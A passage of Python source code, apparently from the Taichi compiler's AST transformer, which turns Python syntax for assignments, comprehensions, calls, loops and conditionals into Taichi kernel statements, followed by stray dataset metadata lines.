node.value.ptr,
is_static_assign)
return None
@staticmethod
def build_assign_unpack(ctx, node_target, values, is_static_assign):
"""Build the unpack assignments like this: (target1, target2) = (value1, value2).
The function should be called only if the node target is a tuple.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
node_target (ast.Tuple): A list or tuple object. `node_target.elts` holds a
list of nodes representing the elements.
values: A node/list representing the values.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
if not isinstance(node_target, ast.Tuple):
return ASTTransformer.build_assign_basic(ctx, node_target, values,
is_static_assign)
targets = node_target.elts
tmp_tuple = values if is_static_assign else impl.expr_init_list(
values, len(targets))
for i, target in enumerate(targets):
ASTTransformer.build_assign_basic(ctx, target, tmp_tuple[i],
is_static_assign)
return None
@staticmethod
def build_assign_basic(ctx, target, value, is_static_assign):
"""Build basic assginment like this: target = value.
Args:
ctx (ast_builder_utils.BuilderContext): The builder context.
target (ast.Name): A variable name. `target.id` holds the name as
a string.
value: A node representing the value.
is_static_assign: A boolean value indicating whether this is a static assignment
"""
is_local = isinstance(target, ast.Name)
if is_static_assign:
if not is_local:
raise TaichiSyntaxError(
"Static assign cannot be used on elements in arrays")
ctx.create_variable(target.id, value)
var = value
elif is_local and not ctx.is_var_declared(target.id):
var = impl.expr_init(value)
ctx.create_variable(target.id, var)
else:
var = build_stmt(ctx, target)
var.assign(value)
return var
@staticmethod
def build_NamedExpr(ctx, node):
build_stmt(ctx, node.value)
is_static_assign = isinstance(
node.value, ast.Call) and node.value.func.ptr is impl.static
node.ptr = ASTTransformer.build_assign_basic(ctx, node.target,
node.value.ptr,
is_static_assign)
return node.ptr
@staticmethod
def is_tuple(node):
if isinstance(node, ast.Tuple):
return True
if isinstance(node, ast.Index) and isinstance(node.value.ptr, tuple):
return True
if isinstance(node.ptr, tuple):
return True
return False
@staticmethod
def build_Subscript(ctx, node):
build_stmt(ctx, node.value)
build_stmt(ctx, node.slice)
if not ASTTransformer.is_tuple(node.slice):
node.slice.ptr = [node.slice.ptr]
node.ptr = impl.subscript(node.value.ptr, *node.slice.ptr)
return node.ptr
@staticmethod
def build_Tuple(ctx, node):
build_stmts(ctx, node.elts)
node.ptr = tuple(elt.ptr for elt in node.elts)
return node.ptr
@staticmethod
def build_List(ctx, node):
build_stmts(ctx, node.elts)
node.ptr = [elt.ptr for elt in node.elts]
return node.ptr
@staticmethod
def build_Dict(ctx, node):
dic = {}
for key, value in zip(node.keys, node.values):
if key is None:
dic.update(build_stmt(ctx, value))
else:
dic[build_stmt(ctx, key)] = build_stmt(ctx, value)
node.ptr = dic
return node.ptr
@staticmethod
def process_listcomp(ctx, node, result):
result.append(build_stmt(ctx, node.elt))
@staticmethod
def process_dictcomp(ctx, node, result):
key = build_stmt(ctx, node.key)
value = build_stmt(ctx, node.value)
result[key] = value
@staticmethod
def process_generators(ctx, node, now_comp, func, result):
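        # Descriptive note (added; not in the original source): comprehension
        # generators are unrolled at compile time -- generator `now_comp` is
        # iterated in a static scope, its `ifs` are checked via process_ifs,
        # and `func` collects each element into `result`.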
if now_comp >= len(node.generators):
return func(ctx, node, result)
with ctx.static_scope_guard():
_iter = build_stmt(ctx, node.generators[now_comp].iter)
for value in _iter:
with ctx.variable_scope_guard():
ASTTransformer.build_assign_unpack(
ctx, node.generators[now_comp].target, value, True)
with ctx.static_scope_guard():
build_stmts(ctx, node.generators[now_comp].ifs)
ASTTransformer.process_ifs(ctx, node, now_comp, 0, func,
result)
return None
@staticmethod
def process_ifs(ctx, node, now_comp, now_if, func, result):
if now_if >= len(node.generators[now_comp].ifs):
return ASTTransformer.process_generators(ctx, node, now_comp + 1,
func, result)
cond = node.generators[now_comp].ifs[now_if].ptr
if cond:
ASTTransformer.process_ifs(ctx, node, now_comp, now_if + 1, func,
result)
return None
@staticmethod
def build_ListComp(ctx, node):
result = []
ASTTransformer.process_generators(ctx, node, 0,
ASTTransformer.process_listcomp,
result)
node.ptr = result
return node.ptr
@staticmethod
def build_DictComp(ctx, node):
result = {}
ASTTransformer.process_generators(ctx, node, 0,
ASTTransformer.process_dictcomp,
result)
node.ptr = result
return node.ptr
@staticmethod
def build_Index(ctx, node):
node.ptr = build_stmt(ctx, node.value)
return node.ptr
@staticmethod
def build_Constant(ctx, node):
node.ptr = node.value
return node.ptr
@staticmethod
def build_Num(ctx, node):
node.ptr = node.n
return node.ptr
@staticmethod
def build_Str(ctx, node):
node.ptr = node.s
return node.ptr
@staticmethod
def build_Bytes(ctx, node):
node.ptr = node.s
return node.ptr
@staticmethod
def build_NameConstant(ctx, node):
node.ptr = node.value
return node.ptr
@staticmethod
def build_keyword(ctx, node):
build_stmt(ctx, node.value)
if node.arg is None:
node.ptr = node.value.ptr
else:
node.ptr = {node.arg: node.value.ptr}
return node.ptr
@staticmethod
def build_Starred(ctx, node):
node.ptr = build_stmt(ctx, node.value)
return node.ptr
@staticmethod
def build_JoinedStr(ctx, node):
str_spec = ''
args = []
for sub_node in node.values:
if isinstance(sub_node, ast.FormattedValue):
str_spec += '{}'
args.append(build_stmt(ctx, sub_node.value))
elif isinstance(sub_node, ast.Constant):
str_spec += sub_node.value
elif isinstance(sub_node, ast.Str):
str_spec += sub_node.s
else:
raise TaichiSyntaxError("Invalid value for fstring.")
args.insert(0, str_spec)
node.ptr = impl.ti_format(*args)
return node.ptr
@staticmethod
def build_call_if_is_builtin(node, args, keywords):
func = node.func.ptr
replace_func = {
id(print): impl.ti_print,
id(min): ti_ops.ti_min,
id(max): ti_ops.ti_max,
id(int): impl.ti_int,
id(float): impl.ti_float,
id(any): ti_ops.ti_any,
id(all): ti_ops.ti_all,
id(abs): abs,
id(pow): pow,
}
if id(func) in replace_func:
node.ptr = replace_func[id(func)](*args, **keywords)
return True
return False
@staticmethod
def warn_if_is_external_func(ctx, node):
func = node.func.ptr
if ctx.is_in_static_scope(): # allow external function in static scope
return
if hasattr(func, "_is_taichi_function") or hasattr(
func, "_is_wrapped_kernel"): # taichi func/kernel
return
if hasattr(func, "is_taichi_class"): # Matrix/Struct
return
try:
file = inspect.getfile(inspect.getmodule(func))
except TypeError:
file = None
if file and os.path.commonpath(
[file, package_root]) == package_root: # functions inside taichi
return
name = unparse(node.func).strip()
warnings.warn_explicit(
f'Calling non-taichi function "{name}". '
f'Scope inside the function is not processed by the Taichi AST transformer. '
f'The function may not work as expected. Proceed with caution! '
f'Maybe you can consider turning it into a @ti.func?', UserWarning,
ctx.file, node.lineno + ctx.lineno_offset)
@staticmethod
def build_Call(ctx, node):
if ASTTransformer.get_decorator(ctx, node) == 'static':
with ctx.static_scope_guard():
build_stmt(ctx, node.func)
build_stmts(ctx, node.args)
build_stmts(ctx, node.keywords)
else:
build_stmt(ctx, node.func)
build_stmts(ctx, node.args)
build_stmts(ctx, node.keywords)
args = []
for arg in node.args:
if isinstance(arg, ast.Starred):
args += arg.ptr
else:
args.append(arg.ptr)
keywords = dict(ChainMap(*[keyword.ptr for keyword in node.keywords]))
func = node.func.ptr
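        # Descriptive note (added; not in the original source): a `.format`
        # call on a string literal, e.g. '{}'.format(x), is rewritten to
        # impl.ti_format so it can be evaluated inside the kernel.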
if isinstance(node.func, ast.Attribute) and isinstance(
node.func.value.ptr, str) and node.func.attr == 'format':
args.insert(0, node.func.value.ptr)
node.ptr = impl.ti_format(*args, **keywords)
elif ASTTransformer.build_call_if_is_builtin(node, args, keywords):
return node.ptr
node.ptr = func(*args, **keywords)
ASTTransformer.warn_if_is_external_func(ctx, node)
return node.ptr
@staticmethod
def build_FunctionDef(ctx, node):
args = node.args
assert args.vararg is None
assert args.kwonlyargs == []
assert args.kw_defaults == []
assert args.kwarg is None
def transform_as_kernel():
# Treat return type
if node.returns is not None:
kernel_arguments.decl_ret(ctx.func.return_type)
for i, arg in enumerate(args.args):
if isinstance(ctx.func.argument_annotations[i],
annotations.template):
continue
elif isinstance(ctx.func.argument_annotations[i],
linalg.sparse_matrix_builder):
ctx.create_variable(arg.arg,
kernel_arguments.decl_sparse_matrix())
elif isinstance(ctx.func.argument_annotations[i],
annotations.any_arr):
ctx.create_variable(
arg.arg,
kernel_arguments.decl_any_arr_arg(
to_taichi_type(ctx.arg_features[i][0]),
ctx.arg_features[i][1], ctx.arg_features[i][2],
ctx.arg_features[i][3]))
elif isinstance(ctx.func.argument_annotations[i], MatrixType):
ctx.global_vars[
arg.arg] = kernel_arguments.decl_matrix_arg(
ctx.func.argument_annotations[i])
else:
ctx.global_vars[
arg.arg] = kernel_arguments.decl_scalar_arg(
ctx.func.argument_annotations[i])
# remove original args
node.args.args = []
build_stmts(ctx, node.decorator_list)
if ctx.is_kernel: # ti.kernel
for decorator in node.decorator_list:
if decorator.ptr is kernel_impl.func:
raise TaichiSyntaxError(
"Function definition not allowed in 'ti.kernel'.")
transform_as_kernel()
else: # ti.func
for decorator in node.decorator_list:
if decorator.ptr is kernel_impl.func:
raise TaichiSyntaxError(
"Function definition not allowed in 'ti.func'.")
if impl.get_runtime().experimental_real_function:
transform_as_kernel()
else:
len_args = len(args.args)
len_default = len(args.defaults)
len_provided = len(ctx.argument_data)
len_minimum = len_args - len_default
if len_args < len_provided or len_args - len_default > len_provided:
if len(args.defaults):
raise TaichiSyntaxError(
f"Function receives {len_minimum} to {len_args} argument(s) and {len_provided} provided."
)
else:
raise TaichiSyntaxError(
f"Function receives {len_args} argument(s) and {len_provided} provided."
)
# Transform as force-inlined func
default_start = len_provided - len_minimum
ctx.argument_data = list(ctx.argument_data)
for arg in args.defaults[default_start:]:
ctx.argument_data.append(build_stmt(ctx, arg))
assert len(args.args) == len(ctx.argument_data)
for i, (arg,
data) in enumerate(zip(args.args, ctx.argument_data)):
# Remove annotations because they are not used.
args.args[i].annotation = None
# Template arguments are passed by reference.
if isinstance(ctx.func.argument_annotations[i],
annotations.template):
ctx.create_variable(ctx.func.argument_names[i], data)
continue
# Create a copy for non-template arguments,
# so that they are passed by value.
ctx.create_variable(arg.arg, impl.expr_init_func(data))
with ctx.variable_scope_guard():
build_stmts(ctx, node.body)
return None
@staticmethod
def build_Return(ctx, node):
if not impl.get_runtime().experimental_real_function:
if ctx.is_in_non_static_control_flow():
raise TaichiSyntaxError(
"Return inside non-static if/for is not supported")
build_stmt(ctx, node.value)
if ctx.is_kernel or impl.get_runtime().experimental_real_function:
# TODO: check if it's at the end of a kernel, throw TaichiSyntaxError if not
if node.value is not None:
if ctx.func.return_type is None:
raise TaichiSyntaxError(
f'A {"kernel" if ctx.is_kernel else "function"} '
'with a return value must be annotated '
'with a return type, e.g. def func() -> ti.f32')
_ti_core.create_kernel_exprgroup_return(
expr.make_expr_group(
ti_ops.cast(expr.Expr(node.value.ptr),
ctx.func.return_type).ptr))
# For args[0], it is an ast.Attribute, because it loads the
# attribute, |ptr|, of the expression |ret_expr|. Therefore we
# only need to replace the object part, i.e. args[0].value
else:
ctx.return_data = node.value.ptr
if not impl.get_runtime().experimental_real_function:
ctx.returned = True
return None
@staticmethod
def build_Module(ctx, node):
with ctx.variable_scope_guard():
# Do NOT use |build_stmts| which inserts 'del' statements to the
# end and deletes parameters passed into the module
for stmt in node.body:
build_stmt(ctx, stmt)
return None
@staticmethod
def build_Attribute(ctx, node):
build_stmt(ctx, node.value)
node.ptr = getattr(node.value.ptr, node.attr)
return node.ptr
@staticmethod
def build_BinOp(ctx, node):
build_stmt(ctx, node.left)
build_stmt(ctx, node.right)
op = {
ast.Add: lambda l, r: l + r,
ast.Sub: lambda l, r: l - r,
ast.Mult: lambda l, r: l * r,
ast.Div: lambda l, r: l / r,
ast.FloorDiv: lambda l, r: l // r,
ast.Mod: lambda l, r: l % r,
ast.Pow: lambda l, r: l**r,
ast.LShift: lambda l, r: l << r,
ast.RShift: lambda l, r: l >> r,
ast.BitOr: lambda l, r: l | r,
ast.BitXor: lambda l, r: l ^ r,
ast.BitAnd: lambda l, r: l & r,
ast.MatMult: lambda l, r: l @ r,
}.get(type(node.op))
node.ptr = op(node.left.ptr, node.right.ptr)
return node.ptr
@staticmethod
def build_AugAssign(ctx, node):
build_stmt(ctx, node.target)
build_stmt(ctx, node.value)
node.ptr = node.target.ptr.augassign(node.value.ptr,
type(node.op).__name__)
return node.ptr
@staticmethod
def build_UnaryOp(ctx, node):
build_stmt(ctx, node.operand)
op = {
ast.UAdd: lambda l: l,
ast.USub: lambda l: -l,
ast.Not: ti_ops.logical_not,
ast.Invert: lambda l: ~l,
}.get(type(node.op))
node.ptr = op(node.operand.ptr)
return node.ptr
@staticmethod
def build_short_circuit_and(operands):
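        # Descriptive note (added; not in the original source): `a and b` is
        # lowered to a frontend if -- when the first operand is true the
        # result is the recursively built rest of the chain, otherwise 0.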
if len(operands) == 1:
return operands[0].ptr
val = impl.expr_init(None)
lhs = operands[0].ptr
impl.begin_frontend_if(lhs)
_ti_core.begin_frontend_if_true()
rhs = ASTTransformer.build_short_circuit_and(operands[1:])
val.assign(rhs)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
val.assign(0)
_ti_core.pop_scope()
return val
@staticmethod
def build_short_circuit_or(operands):
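        # Descriptive note (added; not in the original source): mirror of the
        # `and` case -- when the first operand is true the result is 1,
        # otherwise it is the recursively built rest of the chain.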
if len(operands) == 1:
return operands[0].ptr
val = impl.expr_init(None)
lhs = operands[0].ptr
impl.begin_frontend_if(lhs)
_ti_core.begin_frontend_if_true()
val.assign(1)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
rhs = ASTTransformer.build_short_circuit_or(operands[1:])
val.assign(rhs)
_ti_core.pop_scope()
return val
@staticmethod
def build_normal_bool_op(op):
def inner(operands):
result = op(operands[0].ptr, operands[1].ptr)
for i in range(2, len(operands)):
result = op(result, operands[i].ptr)
return result
return inner
@staticmethod
def build_static_short_circuit_and(operands):
for operand in operands:
if not operand.ptr:
return operand.ptr
return operands[-1].ptr
@staticmethod
def build_static_short_circuit_or(operands):
for operand in operands:
if operand.ptr:
return operand.ptr
return operands[-1].ptr
@staticmethod
def build_BoolOp(ctx, node):
build_stmts(ctx, node.values)
if ctx.is_in_static_scope():
ops = {
ast.And: ASTTransformer.build_static_short_circuit_and,
ast.Or: ASTTransformer.build_static_short_circuit_or,
}
elif impl.get_runtime().short_circuit_operators:
ops = {
ast.And: ASTTransformer.build_short_circuit_and,
ast.Or: ASTTransformer.build_short_circuit_or,
}
else:
ops = {
ast.And:
ASTTransformer.build_normal_bool_op(ti_ops.logical_and),
ast.Or: ASTTransformer.build_normal_bool_op(ti_ops.logical_or),
}
op = ops.get(type(node.op))
node.ptr = op(node.values)
return node.ptr
@staticmethod
def build_Compare(ctx, node):
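        # Descriptive note (added; not in the original source): a chained
        # comparison such as `a < b < c` is folded pairwise below, i.e.
        # evaluated as logical_and(a < b, b < c).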
build_stmt(ctx, node.left)
build_stmts(ctx, node.comparators)
ops = {
ast.Eq: lambda l, r: l == r,
ast.NotEq: lambda l, r: l != r,
ast.Lt: lambda l, r: l < r,
ast.LtE: lambda l, r: l <= r,
ast.Gt: lambda l, r: l > r,
ast.GtE: lambda l, r: l >= r,
}
ops_static = {
ast.In: lambda l, r: l in r,
ast.NotIn: lambda l, r: l not in r,
}
if ctx.is_in_static_scope():
ops = {**ops, **ops_static}
operands = [node.left.ptr
] + [comparator.ptr for comparator in node.comparators]
val = True
for i, node_op in enumerate(node.ops):
l = operands[i]
r = operands[i + 1]
op = ops.get(type(node_op))
if op is None:
if type(node_op) in ops_static:
raise TaichiSyntaxError(
f'"{type(node_op).__name__}" is only supported inside `ti.static`.'
)
else:
raise TaichiSyntaxError(
f'"{type(node_op).__name__}" is not supported in Taichi kernels.'
)
val = ti_ops.logical_and(val, op(l, r))
node.ptr = val
return node.ptr
@staticmethod
def get_decorator(ctx, node):
if not isinstance(node, ast.Call):
return ''
for wanted, name in [
(impl.static, 'static'),
(impl.grouped, 'grouped'),
(ndrange, 'ndrange'),
]:
if ASTResolver.resolve_to(node.func, wanted, ctx.global_vars):
return name
return ''
@staticmethod
def get_for_loop_targets(node):
"""
Returns the list of indices of the for loop |node|.
See also: https://docs.python.org/3/library/ast.html#ast.For
"""
if isinstance(node.target, ast.Name):
return [node.target.id]
assert isinstance(node.target, ast.Tuple)
return [name.id for name in node.target.elts]
@staticmethod
def build_static_for(ctx, node, is_grouped):
if is_grouped:
assert len(node.iter.args[0].args) == 1
ndrange_arg = build_stmt(ctx, node.iter.args[0].args[0])
if not isinstance(ndrange_arg, ndrange):
raise TaichiSyntaxError(
"Only 'ti.ndrange' is allowed in 'ti.static(ti.grouped(...))'."
)
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
for value in impl.grouped(ndrange_arg):
with ctx.variable_scope_guard():
ctx.create_variable(target, value)
build_stmts(ctx, node.body)
status = ctx.loop_status()
if status == LoopStatus.Break:
break
elif status == LoopStatus.Continue:
ctx.set_loop_status(LoopStatus.Normal)
else:
build_stmt(ctx, node.iter)
targets = ASTTransformer.get_for_loop_targets(node)
for target_values in node.iter.ptr:
if not isinstance(
target_values,
collections.abc.Sequence) or len(targets) == 1:
target_values = [target_values]
with ctx.variable_scope_guard():
for target, target_value in zip(targets, target_values):
ctx.create_variable(target, target_value)
build_stmts(ctx, node.body)
status = ctx.loop_status()
if status == LoopStatus.Break:
break
elif status == LoopStatus.Continue:
ctx.set_loop_status(LoopStatus.Normal)
return None
@staticmethod
def build_range_for(ctx, node):
with ctx.variable_scope_guard():
loop_name = node.target.id
ctx.check_loop_var(loop_name)
loop_var = expr.Expr(_ti_core.make_id_expr(''))
ctx.create_variable(loop_name, loop_var)
if len(node.iter.args) not in [1, 2]:
raise TaichiSyntaxError(
f"Range should have 1 or 2 arguments, found {len(node.iter.args)}"
)
if len(node.iter.args) == 2:
begin = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[0])),
primitive_types.i32)
end = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[1])),
primitive_types.i32)
else:
begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
end = ti_ops.cast(
expr.Expr(build_stmt(ctx, node.iter.args[0])),
primitive_types.i32)
_ti_core.begin_frontend_range_for(loop_var.ptr, begin.ptr, end.ptr)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_ndrange_for(ctx, node):
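        # Descriptive note (added; not in the original source): the ndrange
        # is flattened into a single linear index I; each loop target is
        # recovered by floor-dividing I by the accumulated trailing
        # dimensions and shifting by that axis' lower bound.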
with ctx.variable_scope_guard():
ndrange_var = impl.expr_init(build_stmt(ctx, node.iter))
ndrange_begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
ndrange_end = ti_ops.cast(
expr.Expr(impl.subscript(ndrange_var.acc_dimensions, 0)),
primitive_types.i32)
ndrange_loop_var = expr.Expr(_ti_core.make_id_expr(''))
_ti_core.begin_frontend_range_for(ndrange_loop_var.ptr,
ndrange_begin.ptr,
ndrange_end.ptr)
I = impl.expr_init(ndrange_loop_var)
targets = ASTTransformer.get_for_loop_targets(node)
for i, target in enumerate(targets):
if i + 1 < len(targets):
target_tmp = impl.expr_init(
I // ndrange_var.acc_dimensions[i + 1])
else:
target_tmp = impl.expr_init(I)
ctx.create_variable(
target,
impl.expr_init(target_tmp + impl.subscript(
impl.subscript(ndrange_var.bounds, i), 0)))
if i + 1 < len(targets):
I.assign(I -
target_tmp * ndrange_var.acc_dimensions[i + 1])
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_grouped_ndrange_for(ctx, node):
with ctx.variable_scope_guard():
ndrange_var = impl.expr_init(build_stmt(ctx, node.iter.args[0]))
ndrange_begin = ti_ops.cast(expr.Expr(0), primitive_types.i32)
ndrange_end = ti_ops.cast(
expr.Expr(impl.subscript(ndrange_var.acc_dimensions, 0)),
primitive_types.i32)
ndrange_loop_var = expr.Expr(_ti_core.make_id_expr(''))
_ti_core.begin_frontend_range_for(ndrange_loop_var.ptr,
ndrange_begin.ptr,
ndrange_end.ptr)
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
target_var = impl.expr_init(
matrix.Vector([0] * len(ndrange_var.dimensions),
dt=primitive_types.i32))
ctx.create_variable(target, target_var)
I = impl.expr_init(ndrange_loop_var)
for i in range(len(ndrange_var.dimensions)):
if i + 1 < len(ndrange_var.dimensions):
target_tmp = I // ndrange_var.acc_dimensions[i + 1]
else:
target_tmp = I
impl.subscript(target_var,
i).assign(target_tmp + ndrange_var.bounds[i][0])
if i + 1 < len(ndrange_var.dimensions):
I.assign(I -
target_tmp * ndrange_var.acc_dimensions[i + 1])
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_struct_for(ctx, node, is_grouped):
# for i, j in x
# for I in ti.grouped(x)
targets = ASTTransformer.get_for_loop_targets(node)
for target in targets:
ctx.check_loop_var(target)
with ctx.variable_scope_guard():
if is_grouped:
if len(targets) != 1:
raise TaichiSyntaxError(
f"Group for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
loop_var = build_stmt(ctx, node.iter)
loop_indices = expr.make_var_list(size=len(loop_var.shape))
expr_group = expr.make_expr_group(loop_indices)
impl.begin_frontend_struct_for(expr_group, loop_var)
ctx.create_variable(
target, matrix.Vector(loop_indices,
dt=primitive_types.i32))
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
else:
_vars = []
for name in targets:
var = expr.Expr(_ti_core.make_id_expr(""))
_vars.append(var)
ctx.create_variable(name, var)
loop_var = node.iter.ptr
expr_group = expr.make_expr_group(*_vars)
impl.begin_frontend_struct_for(expr_group, loop_var)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_mesh_for(ctx, node):
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
"Mesh for should have 1 loop target, found {len(targets)}")
target = targets[0]
with ctx.variable_scope_guard():
var = expr.Expr(_ti_core.make_id_expr(""))
ctx.mesh = node.iter.ptr.mesh
assert isinstance(ctx.mesh, impl.MeshInstance)
mesh_idx = mesh.MeshElementFieldProxy(ctx.mesh,
node.iter.ptr._type, var.ptr)
ctx.create_variable(target, mesh_idx)
_ti_core.begin_frontend_mesh_for(mesh_idx.ptr, ctx.mesh.mesh_ptr,
node.iter.ptr._type)
build_stmts(ctx, node.body)
ctx.mesh = None
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_nested_mesh_for(ctx, node):
targets = ASTTransformer.get_for_loop_targets(node)
if len(targets) != 1:
raise TaichiSyntaxError(
"Nested-mesh for should have 1 loop target, found {len(targets)}"
)
target = targets[0]
with ctx.variable_scope_guard():
ctx.mesh = node.iter.ptr.mesh
assert isinstance(ctx.mesh, impl.MeshInstance)
loop_name = node.target.id + '_index__'
loop_var = expr.Expr(_ti_core.make_id_expr(''))
ctx.create_variable(loop_name, loop_var)
begin = expr.Expr(0)
end = node.iter.ptr.size
_ti_core.begin_frontend_range_for(loop_var.ptr, begin.ptr, end.ptr)
entry_expr = _ti_core.get_relation_access(
ctx.mesh.mesh_ptr, node.iter.ptr.from_index.ptr,
node.iter.ptr.to_element_type, loop_var.ptr)
entry_expr.type_check()
mesh_idx = mesh.MeshElementFieldProxy(
ctx.mesh, node.iter.ptr.to_element_type, entry_expr)
ctx.create_variable(target, mesh_idx)
build_stmts(ctx, node.body)
_ti_core.end_frontend_range_for()
return None
@staticmethod
def build_For(ctx, node):
if node.orelse:
raise TaichiSyntaxError(
"'else' clause for 'for' not supported in Taichi kernels")
decorator = ASTTransformer.get_decorator(ctx, node.iter)
double_decorator = ''
if decorator != '' and len(node.iter.args) == 1:
double_decorator = ASTTransformer.get_decorator(
ctx, node.iter.args[0])
if decorator == 'static':
if double_decorator == 'static':
raise TaichiSyntaxError("'ti.static' cannot be nested")
with ctx.loop_scope_guard(is_static=True):
return ASTTransformer.build_static_for(
ctx, node, double_decorator == 'grouped')
with ctx.loop_scope_guard():
if decorator == 'ndrange':
if double_decorator != '':
raise TaichiSyntaxError(
"No decorator is allowed inside 'ti.ndrange")
return ASTTransformer.build_ndrange_for(ctx, node)
if decorator == 'grouped':
if double_decorator == 'static':
raise TaichiSyntaxError(
"'ti.static' is not allowed inside 'ti.grouped'")
elif double_decorator == 'ndrange':
return ASTTransformer.build_grouped_ndrange_for(ctx, node)
elif double_decorator == 'grouped':
raise TaichiSyntaxError("'ti.grouped' cannot be nested")
else:
return ASTTransformer.build_struct_for(ctx,
node,
is_grouped=True)
elif isinstance(node.iter, ast.Call) and isinstance(
node.iter.func, ast.Name) and node.iter.func.id == 'range':
return ASTTransformer.build_range_for(ctx, node)
else:
build_stmt(ctx, node.iter)
if isinstance(node.iter.ptr, mesh.MeshElementField):
if not _ti_core.is_extension_supported(
impl.default_cfg().arch, _ti_core.Extension.mesh):
raise Exception(
'Backend ' + str(impl.default_cfg().arch) +
' doesn\'t support MeshTaichi extension')
return ASTTransformer.build_mesh_for(ctx, node)
if isinstance(node.iter.ptr, mesh.MeshRelationAccessProxy):
return ASTTransformer.build_nested_mesh_for(ctx, node)
# Struct for
return ASTTransformer.build_struct_for(ctx,
node,
is_grouped=False)
@staticmethod
def build_While(ctx, node):
if node.orelse:
raise TaichiSyntaxError(
"'else' clause for 'while' not supported in Taichi kernels")
with ctx.loop_scope_guard():
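            # Descriptive note (added; not in the original source): `while
            # cond` is lowered to an unconditional frontend while whose body
            # first re-evaluates cond and breaks when it is false.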
_ti_core.begin_frontend_while(expr.Expr(1).ptr)
while_cond = build_stmt(ctx, node.test)
impl.begin_frontend_if(while_cond)
_ti_core.begin_frontend_if_true()
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
_ti_core.insert_break_stmt()
_ti_core.pop_scope()
build_stmts(ctx, node.body)
_ti_core.pop_scope()
return None
@staticmethod
def build_If(ctx, node):
build_stmt(ctx, node.test)
is_static_if = (ASTTransformer.get_decorator(ctx,
node.test) == "static")
if is_static_if:
if node.test.ptr:
build_stmts(ctx, node.body)
else:
build_stmts(ctx, node.orelse)
return node
with ctx.non_static_control_flow_guard():
impl.begin_frontend_if(node.test.ptr)
_ti_core.begin_frontend_if_true()
build_stmts(ctx, node.body)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
build_stmts(ctx, node.orelse)
_ti_core.pop_scope()
return None
@staticmethod
def build_Expr(ctx, node):
if not isinstance(
node.value,
ast.Call) or not impl.get_runtime().experimental_real_function:
build_stmt(ctx, node.value)
return None
args = [build_stmt(ctx, node.value.func)
] + [arg.ptr for arg in build_stmts(ctx, node.value.args)]
impl.insert_expr_stmt_if_ti_func(*args)
return None
@staticmethod
def build_IfExp(ctx, node):
build_stmt(ctx, node.test)
build_stmt(ctx, node.body)
build_stmt(ctx, node.orelse)
if is_taichi_class(node.test.ptr) or is_taichi_class(
node.body.ptr) or is_taichi_class(node.orelse.ptr):
node.ptr = ti_ops.select(node.test.ptr, node.body.ptr,
node.orelse.ptr)
return node.ptr
is_static_if = (ASTTransformer.get_decorator(ctx,
node.test) == "static")
if is_static_if:
if node.test.ptr:
node.ptr = build_stmt(ctx, node.body)
else:
node.ptr = build_stmt(ctx, node.orelse)
return node.ptr
val = impl.expr_init(None)
impl.begin_frontend_if(node.test.ptr)
_ti_core.begin_frontend_if_true()
val.assign(node.body.ptr)
_ti_core.pop_scope()
_ti_core.begin_frontend_if_false()
val.assign(node.orelse.ptr)
_ti_core.pop_scope()
node.ptr = val
return node.ptr
@staticmethod
def _is_string_mod_args(msg):
# 1. str % (a, b, c, ...)
# 2. str % single_item
# Note that |msg.right| may not be a tuple.
if not isinstance(msg, ast.BinOp):
return False
if not isinstance(msg.op, ast.Mod):
return False
if isinstance(msg.left, ast.Str):
return True
if isinstance(msg.left, ast.Constant) and isinstance(
msg.left.value, str):
return True
return False
@staticmethod
def _handle_string_mod_args(ctx, node):
msg = build_stmt(ctx, node.left)
args = build_stmt(ctx, node.right)
if not isinstance(args, collections.abc.Sequence):
args = (args, )
return msg, args
@staticmethod
def build_Assert(ctx, node):
extra_args = []
if node.msg is not None:
if isinstance(node.msg, ast.Constant):
msg = node.msg.value
elif isinstance(node.msg, ast.Str):
msg = node.msg.s
elif ASTTransformer._is_string_mod_args(node.msg):
msg, extra_args = ASTTransformer._handle_string_mod_args(
ctx, node.msg)
else:
raise ValueError(
f"assert info must be constant, not {ast.dump(node.msg)}")
else:
msg = astor.to_source(node.test)
test = build_stmt(ctx, node.test)
impl.ti_assert(test, msg.strip(), extra_args)
return None
@staticmethod
def build_Break(ctx, node):
if ctx.is_in_static_for():
ctx.set_loop_status(LoopStatus.Break)
else:
_ti_core.insert_break_stmt()
return None
@staticmethod
def build_Continue(ctx, node):
if ctx.is_in_static_for():
ctx.set_loop_status(LoopStatus.Continue)
else:
_ti_core.insert_continue_stmt()
return None
@staticmethod
def build_Pass(ctx, node):
return None
@staticmethod
def build_Raise(ctx, node):
raise build_stmt(ctx, node.exc)
build_stmt = ASTTransformer()
def build_stmts(ctx, stmts):
with ctx.variable_scope_guard():
for stmt in stmts:
if ctx.returned or ctx.loop_status() != LoopStatus.Normal:
break
else:
build_stmt(ctx, stmt)
return stmts
| 38.42311
| 117
| 0.554882
|
4a143a5a5fe163a09a02c538e2ad5a51f82788de
| 6,056
|
py
|
Python
|
src/zip_update.py
|
fullstackslayer/electric
|
de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | 2
|
2021-05-16T06:54:13.000Z
|
2021-07-04T08:36:38.000Z
|
src/zip_update.py
|
vidhyanijadala/electric
|
